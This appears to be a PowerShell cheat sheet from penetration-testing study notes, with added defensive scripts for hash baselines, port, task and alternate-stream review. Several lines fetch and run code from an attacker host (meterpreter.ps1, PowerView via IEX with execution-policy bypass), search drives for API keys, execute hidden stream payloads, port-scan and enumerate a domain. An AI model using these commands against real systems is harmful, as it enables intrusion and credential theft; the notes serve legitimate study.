Get-Help Command-Name
Get-Help Command-Name -Examples
Get-Command
Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*
Verb-Noun | Get-Member
Get-Command | Get-Member -MemberType Method
Get-ChildItem | Select-Object -Property Mode, Name
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
The second version uses the $_ automatic variable, which holds the current object as Where-Object processes each object in the pipeline one at a time. Where -operator is one of the following comparison operators:
Verb-Noun | Sort-Object
Get-ChildItem | Sort-Object
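A worked illustration of both Where-Object forms and of Sort-Object, added here as an example rather than taken from the original notes. The service objects are constructed inline so the snippet runs on any host; the property names are made up for the example.

```powershell
# Constructed sample objects standing in for real cmdlet output (not from the notes)
$services = @(
    [pscustomobject]@{ Name = 'Spooler';  Status = 'Running'; StartType = 'Automatic' }
    [pscustomobject]@{ Name = 'WinRM';    Status = 'Stopped'; StartType = 'Manual'    }
    [pscustomobject]@{ Name = 'Sysmon64'; Status = 'Running'; StartType = 'Automatic' }
)

# Simplified syntax: one property, one comparison operator, one value
$services | Where-Object -Property Status -EQ 'Running'

# Script-block syntax: $_ is the object currently moving through the pipeline,
# so several tests can be combined with -and / -or and any property inspected
$services | Where-Object { $_.Status -eq 'Running' -and $_.StartType -eq 'Automatic' }

# Operators are case-insensitive by default; the c-prefixed forms are case-sensitive
$services | Where-Object { $_.Name -cmatch '^S' }    # Spooler and Sysmon64
$services | Where-Object { $_.Name -clike 'win*' }   # nothing: the 'W' is upper-case

# Sort-Object orders on one or more properties; -Descending reverses the order
$services | Sort-Object -Property Status, Name -Descending
```

The script-block form is the one to reach for whenever the test involves more than a single property, or when the property value needs a method call before comparison.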
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
Get-HotFix | Format-list | findstr <searchstring>
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
Get-Content 'C:\Program Files\interesting-file.txt'
(Get-Content -Path file.txt)[index]
Select-String <filename> -Pattern <pattern>
Copy-Item <sourcefile> <destfile>
As an example, count all cmdlets on the system:
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
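Get-FileHash is most useful when there is something to compare against. The following is an added example, not part of the original notes: it records a SHA256 baseline of a directory to CSV and later diffs the live tree against it to report added, removed and modified files. SHA256 is used instead of MD5 because MD5 collisions are practical; the paths are placeholders.

```powershell
# Record Path -> SHA256 for every file under $Path (added example, not from the notes)
function New-HashBaseline {
    param([string]$Path, [string]$BaselineCsv)
    Get-ChildItem -Path $Path -File -Recurse -ErrorAction SilentlyContinue |
        Get-FileHash -Algorithm SHA256 |
        Select-Object Path, Hash |
        Export-Csv -Path $BaselineCsv -NoTypeInformation
}

# Re-hash the tree and report what changed relative to the stored baseline
function Compare-HashBaseline {
    param([string]$Path, [string]$BaselineCsv)

    $baseline = @{}
    Import-Csv -Path $BaselineCsv | ForEach-Object { $baseline[$_.Path] = $_.Hash }

    $current = @{}
    Get-ChildItem -Path $Path -File -Recurse -ErrorAction SilentlyContinue |
        Get-FileHash -Algorithm SHA256 |
        ForEach-Object { $current[$_.Path] = $_.Hash }

    foreach ($p in $current.Keys) {
        if (-not $baseline.ContainsKey($p)) {
            [pscustomobject]@{ Change = 'Added';    Path = $p }
        } elseif ($baseline[$p] -ne $current[$p]) {
            [pscustomobject]@{ Change = 'Modified'; Path = $p }
        }
    }
    foreach ($p in $baseline.Keys) {
        if (-not $current.ContainsKey($p)) {
            [pscustomobject]@{ Change = 'Removed';  Path = $p }
        }
    }
}

# Usage (placeholder paths): take the baseline once, compare after a suspected change
New-HashBaseline     -Path 'C:\Program Files\App' -BaselineCsv '.\app-baseline.csv'
Compare-HashBaseline -Path 'C:\Program Files\App' -BaselineCsv '.\app-baseline.csv' |
    Format-Table -AutoSize
```

Store the baseline CSV somewhere the monitored host cannot write to; a baseline that lives next to the files it describes can be rewritten along with them.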
Get-Location
ls | Format-List *
Invoke-WebRequest -Uri 'http://<attacker-ip>' -OutFile <filename>
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
powershell -ExecutionPolicy Bypass -File .\<file>
Set-ExecutionPolicy Bypass -Scope Process
Get-LocalUser
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
Get-WmiObject win32_useraccount | Select name, sid
netstat -ano
Get-NetIpAddress
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
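Get-NetTCPConnection on its own only gives ports and PIDs. The following added example (not from the original notes) joins each listening socket to its owning process so a responder can see at a glance which binary is behind each port; the "outside System32" filter at the end is an assumed triage heuristic, not a rule from the page.

```powershell
# Inventory listening TCP ports together with the owning process (added example)
function Get-ListeningPortInventory {
    Get-NetTCPConnection -State Listen |
        ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            # Reading Path can fail for protected processes, so guard it
            $path = if ($proc) { try { $proc.Path } catch { $null } } else { $null }
            [pscustomobject]@{
                LocalAddress = $_.LocalAddress
                LocalPort    = $_.LocalPort
                PID          = $_.OwningProcess
                ProcessName  = if ($proc) { $proc.ProcessName } else { '<unknown>' }
                Path         = $path
            }
        } |
        Sort-Object LocalPort
}

# Full inventory
Get-ListeningPortInventory | Format-Table -AutoSize

# Heuristic (assumed for this example): listeners bound to every interface whose
# binary does not live under System32 deserve a closer look
Get-ListeningPortInventory |
    Where-Object {
        $_.LocalAddress -in @('0.0.0.0', '::') -and
        $_.Path -and
        $_.Path -notlike "$env:SystemRoot\System32\*"
    } |
    Format-Table LocalPort, PID, ProcessName, Path -AutoSize
```

Run it elevated: without administrator rights Get-Process cannot read the path of processes owned by other users, and those rows show a blank Path rather than a suspicious one.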
Get-Hotfix
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
wmic qfe get Caption,Description,HotFixID,InstalledOn
driverquery
Start-Process <process>
Get-Process <process>
schtasks /query /fo LIST /v
Get-ScheduledTaskInfo
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
or
Get-ScheduledTask -TaskName taskname
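Get-ScheduledTask and Get-ScheduledTaskInfo each show part of the picture; when reviewing tasks for unexpected persistence you want the action, the account it runs as and the run times side by side. This added example (not from the original notes) flattens every task action into one row; the "not under the Windows directory" filter is an assumed heuristic for the example.

```powershell
# One row per task action, with principal and run times (added example)
function Get-TaskActionInventory {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        $info = $task | Get-ScheduledTaskInfo
        foreach ($action in $task.Actions) {
            [pscustomobject]@{
                TaskPath    = $task.TaskPath
                TaskName    = $task.TaskName
                State       = $task.State
                RunAs       = $task.Principal.UserId
                Execute     = $action.Execute      # null for COM-handler actions
                Arguments   = $action.Arguments
                LastRunTime = $info.LastRunTime
                NextRunTime = $info.NextRunTime
            }
        }
    }
}

# Everything, newest last run first
Get-TaskActionInventory | Sort-Object LastRunTime -Descending | Format-Table -AutoSize

# Heuristic (assumed for this example): executables outside the Windows directory,
# or scripts launched through an interpreter, are the usual places persistence hides
Get-TaskActionInventory |
    Where-Object {
        $_.Execute -and (
            $_.Execute -notlike "$env:SystemRoot\*" -or
            $_.Arguments -match '\.(ps1|vbs|js|bat)\b'
        )
    } |
    Format-Table TaskName, RunAs, Execute, Arguments -AutoSize
```

Compare the output against a known-good host of the same build; vendor tasks vary enough between images that a bare list is hard to judge without a reference.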
Get-Item -Path file.exe -Stream *
wmic process call create $(Resolve-Path file.exe:streamname)
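Get-Item -Stream * inspects one file. The following added example (not part of the original notes) walks a directory tree and reports every file that carries an alternate data stream other than the default :$DATA stream, which is how content hidden the way the line above uses would show up in a sweep. Zone.Identifier is the common benign stream (mark-of-the-web), so it is excluded unless asked for; the default path is an assumption.

```powershell
# Report non-default NTFS streams under a directory (added example)
function Find-AlternateDataStreams {
    param(
        [string]$Path = $env:USERPROFILE,   # assumed default for the example
        [switch]$IncludeZoneIdentifier
    )
    Get-ChildItem -Path $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            # -LiteralPath so that brackets or wildcards in file names are not interpreted
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                Where-Object { $IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier' } |
                Select-Object FileName, Stream, Length
        }
}

# Sweep a shared location; large streams on small files are the ones to open first
Find-AlternateDataStreams -Path 'C:\Users\Public' |
    Sort-Object Length -Descending |
    Format-Table -AutoSize
```

A stream can be read with Get-Content -Stream <name> and a hash taken with Get-FileHash on the same path, so a finding here plugs straight into the file-inspection commands earlier in these notes.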
Get-Process <process> | Export-Csv <output.csv>
Get-ACL C:\
for($i=1; $i -le 65535; $i++) { Test-NetConnection localhost -Port $i}
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2.$_ | Select-String ttl}
sc.exe query windefend
sc.exe queryex type= service
Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
Get-NetGPO
Get-NetDomainTrust
Find-LocalAdminAccess
whoami /priv
Import-Module ActiveDirectory
Get-ADGroup
Get-ADGroupMember
Get-ADPrincipalGroupMembership